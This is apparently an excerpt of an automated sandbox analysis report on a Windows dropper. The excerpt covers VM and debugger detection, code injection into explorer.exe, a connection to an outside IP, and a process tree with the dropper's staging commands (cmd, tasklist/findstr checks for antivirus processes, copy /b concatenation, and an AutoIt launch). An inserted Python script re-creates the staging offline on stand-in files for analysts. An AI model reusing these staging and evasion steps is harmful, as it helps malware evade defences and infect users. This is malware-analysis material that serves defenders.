        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_0079D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_0079D921
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_0079DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_0079DC54
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B4A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00B4A087
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B4A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00B4A1E2
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B3E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_00B3E472
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B4A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00B4A570
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B466DC FindFirstFileW,FindNextFileW,FindClose,19_2_00B466DC
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_00B473D4
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B47333 FindFirstFileW,FindClose,19_2_00B47333
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B3D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00B3D921
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B3DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00B3DC54
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00735FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00735FC8
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
        Source: explorer.exe, 00000011.00000002.2870993996.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: ssjhrji, 00000013.00000002.2864843617.0000000001198000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
        Source: explorer.exe, 00000011.00000002.2870173011.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
        Source: explorer.exe, 00000011.00000002.2870173011.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
        Source: explorer.exe, 00000011.00000002.2870993996.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
        Source: file.exe, 00000000.00000002.1785552493.0000000000658000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\++)
        Source: explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
        Source: explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000011.00000000.2277176998.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
        Source: explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
        Source: explorer.exe, 00000011.00000002.2870173011.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
        Source: file.exe, 00000000.00000002.1785552493.0000000000658000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gSCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: Existence.pif, 0000000A.00000002.2230599399.0000000005263000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2276485731.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2276485731.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.000000000982D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: Existence.pif, 0000000A.00000002.2230599399.0000000005263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWT[
        Source: explorer.exe, 00000011.00000000.2277176998.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: explorer.exe, 00000011.00000000.2274432480.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
        Source: Existence.pif, 0000000A.00000002.2230160337.00000000014F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
        Source: explorer.exe, 00000011.00000002.2870173011.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
        Source: explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: ssjhrji, 00000013.00000002.2864843617.0000000001198000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-3803
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif System information queried: ModuleInformation
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Process information queried: ProcessInformation

        Anti Debugging

        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif System information queried: CodeIntegrityInformation
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep graph_10-98105
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Process queried: DebugPort
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007AF4FF BlockInput,10_2_007AF4FF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0073338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_0073338B
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00735FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00735FC8
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00755058 mov eax, dword ptr fs:[00000030h]10_2_00755058
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00755058 mov eax, dword ptr fs:[00000030h]16_2_00755058
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AF5058 mov eax, dword ptr fs:[00000030h]19_2_00AF5058
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007920AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,10_2_007920AA
        Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00762992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00762992
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00750BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00750BAF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00750D45 SetUnhandledExceptionFilter,10_2_00750D45
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00750F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00750F91
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00762992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00762992
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00750BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00750BAF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00750D45 SetUnhandledExceptionFilter,16_2_00750D45
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00750F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00750F91
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B02992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00B02992
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AF0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00AF0BAF
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AF0D45 SetUnhandledExceptionFilter,19_2_00AF0D45
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AF0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00AF0F91

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\explorer.exe File created: ssjhrji.17.dr
        Source: C:\Windows\explorer.exe Network Connect: 186.10.34.243 80
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Thread created: C:\Windows\explorer.exe EIP: 31419F8
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00791B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00791B4D
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0073338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_0073338B
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0079BBED SendInput,keybd_event,10_2_0079BBED
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0079EC6C mouse_event,10_2_0079EC6C
        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exit
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1151
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "decentrisingadvertisementssuite" Appliance
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Annually + Protective 1151\b
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif 1151\Existence.pif 1151\b
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007914AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_007914AE
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00791FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00791FB0
        Source: file.exe, 00000000.00000003.1610699946.0000000002822000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000000.1679411491.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Existence.pif, 00000010.00000000.2168782443.00000000007F3000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: Existence.pif, explorer.exe, 00000011.00000000.2274259144.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2276485731.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2273100721.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000011.00000000.2273100721.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2864929618.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
        Source: explorer.exe, 00000011.00000000.2272845685.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
        Source: explorer.exe, 00000011.00000000.2273100721.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2864929618.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
        Source: explorer.exe, 00000011.00000000.2273100721.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2864929618.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00750A08 cpuid 10_2_00750A08
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0078E5F4 GetLocalTime,10_2_0078E5F4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0078E652 GetUserNameW,10_2_0078E652
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0076BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_0076BCD2
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
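The process tree above shows the dropper's staging recipe: an extensionless file is renamed to `Spirit.cmd` and run, `findstr /V "decentrisingadvertisementssuite" Appliance` strips the junk lines that were padded into the AutoIt interpreter, `copy /b Annually + Protective 1151\b` glues the two halves of the script back together, and `Existence.pif 1151\b` runs it. The script below is an added example, not Joe Sandbox output and not the sample's own code: it re-creates those two transformations offline so an analyst can recover the staged files from the dropped artefacts without executing them. It assumes the `findstr /V` output was redirected into `1151\Existence.pif` (the report shows the command but not its redirect target) and uses a constructed stand-in for the padded files rather than the real ones.

```python
"""Re-create the dropper's batch staging offline (added example; not sample or sandbox code)."""
import hashlib
import struct

# The literal the sample passes to findstr /V (taken from the process tree in the report).
JUNK_MARKER = b"decentrisingadvertisementssuite"


def findstr_v(data: bytes, marker: bytes) -> bytes:
    """Approximate `findstr /V "marker" file`: drop every line that contains marker.

    Lines are split on LF only, not with bytes.splitlines(), which would also
    break on a bare CR and corrupt a binary payload. (Assumption: this is close
    enough for junk-padded PE files; findstr's exact binary handling is not
    documented in the report.)
    """
    lines = data.split(b"\n")
    tail = lines.pop()                      # bytes after the last LF ("" if data ends in LF)
    kept = [ln + b"\n" for ln in lines if marker not in ln]
    if tail and marker not in tail:
        kept.append(tail)
    return b"".join(kept)


def copy_b(*parts: bytes) -> bytes:
    """Emulate `copy /b a + b out`: raw concatenation, no Ctrl-Z handling."""
    return b"".join(parts)


def looks_like_pe(blob: bytes) -> bool:
    """True if blob has an MZ header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_stage(appliance: bytes, annually: bytes, protective: bytes) -> dict:
    """Apply the two batch transformations and summarise what came out."""
    existence_pif = findstr_v(appliance, JUNK_MARKER)   # assumed redirect target of findstr /V
    script_b = copy_b(annually, protective)             # 1151\b, the AutoIt script
    return {
        "Existence.pif": existence_pif,
        "b": script_b,
        "pif_is_pe": looks_like_pe(existence_pif),
        "pif_sha256": hashlib.sha256(existence_pif).hexdigest(),
        "b_sha256": hashlib.sha256(script_b).hexdigest(),
    }


# ---- constructed stand-ins for the dropped files (not the real artefacts) ----
def make_clean_pe_stub() -> bytes:
    """Minimal MZ/PE skeleton that, like a real PE, contains LF bytes in its body."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)     # 0x40-byte DOS header
    struct.pack_into("<I", hdr, 0x3C, 0x80)     # e_lfanew -> 0x80
    body = b"\x90\n" * 0x20                     # 0x40 bytes of filler containing LFs
    return bytes(hdr) + body + b"PE\0\0" + b"\r\n.text\n"


def pad_with_junk(clean: bytes, marker: bytes) -> bytes:
    """Insert a marker-bearing junk line before every line, the way the padded file was built."""
    junk = marker + b" padding line\r\n"
    return junk + (b"\n" + junk).join(clean.split(b"\n"))


CLEAN_PE = make_clean_pe_stub()
APPLIANCE = pad_with_junk(CLEAN_PE, JUNK_MARKER)                       # padded interpreter
ANNUALLY, PROTECTIVE = b"#NoTrayIcon\r\n", b"Run('payload.exe')\r\n"   # two halves of the script


if __name__ == "__main__":
    result = recover_stage(APPLIANCE, ANNUALLY, PROTECTIVE)
    print("padded input is a PE:", looks_like_pe(APPLIANCE))
    print("recovered Existence.pif is a PE:", result["pif_is_pe"], result["pif_sha256"])
    print("recovered b:", result["b"])
```

Against real artefacts, replace the constructed inputs with the bytes of the dropped `Appliance`, `Annually` and `Protective` files; `pif_is_pe` tells you whether the junk filter produced a loadable PE, and the hashes are what you would then look up against the rest of the report.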

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Existence.pif | Binary or memory string: WIN_81
        Source: Existence.pif | Binary or memory string: WIN_XP
        Source: ssjhrji.17.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
        Source: Existence.pif | Binary or memory string: WIN_XPe
        Source: Existence.pif | Binary or memory string: WIN_VISTA
        Source: Existence.pif | Binary or memory string: WIN_7
        Source: Existence.pif | Binary or memory string: WIN_8
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Directory queried: C:\Users\user\Documents

        Remote Access Functionality

        Source: Yara match | File source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_007B2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_007B2263
